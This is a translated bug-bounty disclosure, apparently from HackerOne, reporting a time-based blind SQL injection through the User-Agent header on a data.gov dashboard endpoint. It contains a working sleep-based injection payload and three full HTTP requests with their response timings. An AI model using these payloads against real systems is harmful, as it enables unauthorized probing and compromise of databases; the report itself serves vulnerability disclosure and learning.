SQL注入之User-Agent注入

漏洞信息

披露者：harisec
危害程度：高危
漏洞類型：sql注入

漏洞介紹

經過訪問：
https://labs.data.gov/dashboard/datagov/csv_to_json抓包在user-agent頭在中進行SQL注入
我沒有從數據庫中提取任何數據，我已經使用sleep函數 SQL查詢確認了該漏洞。該命令與算術操做相結合，將致使服務器響應不一樣的時間取決於算術運算的結果。
例如，將該值設置：
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
到User-Agent頭部將致使服務器延遲響應25（5×5）秒。
要重現，請發送如下HTTPS請求：

GET /dashboard/datagov/csv_to_json HTTP/1.1
Referer: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR' X-Forwarded-For: 1
X-Requested-With: XMLHttpRequest
Host: labs.data.gov
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

服務器將在25（5 5）秒後響應-與User-Agent:標頭的值相同。
如今，讓服務器當即響應。咱們將發送值sleep（5 5 * 0），它等於0。

GET /dashboard/datagov/csv_to_json HTTP/1.1
Referer: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
X-Forwarded-For: 1
X-Requested-With: XMLHttpRequest
Host: labs.data.gov
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

服務器當即響應爲5 5 0 = 0。
讓咱們經過另外一個請求進行確認：

GET /dashboard/datagov/csv_to_json HTTP/1.1
Referer: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(6*6-30),0))OR'
X-Forwarded-For: 1
X-Requested-With: XMLHttpRequest
Host: labs.data.gov
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

此次，有效負載包含6 * 6-30，等於6。服務器在6秒鐘後響應。
這些只是我嘗試確認此問題的帶有各類算術運算的SQL查詢中的一些。

漏洞影響

***者能夠操縱發送到MySQL數據庫的SQL語句，並注入惡意SQL語句。***者能夠更改對數據庫執行的SQL語句的命令。

翻譯自hackerone
免責申明：本文由互聯網整理翻譯而來,僅供我的學習參考,若有侵權,請聯繫咱們,告知刪除。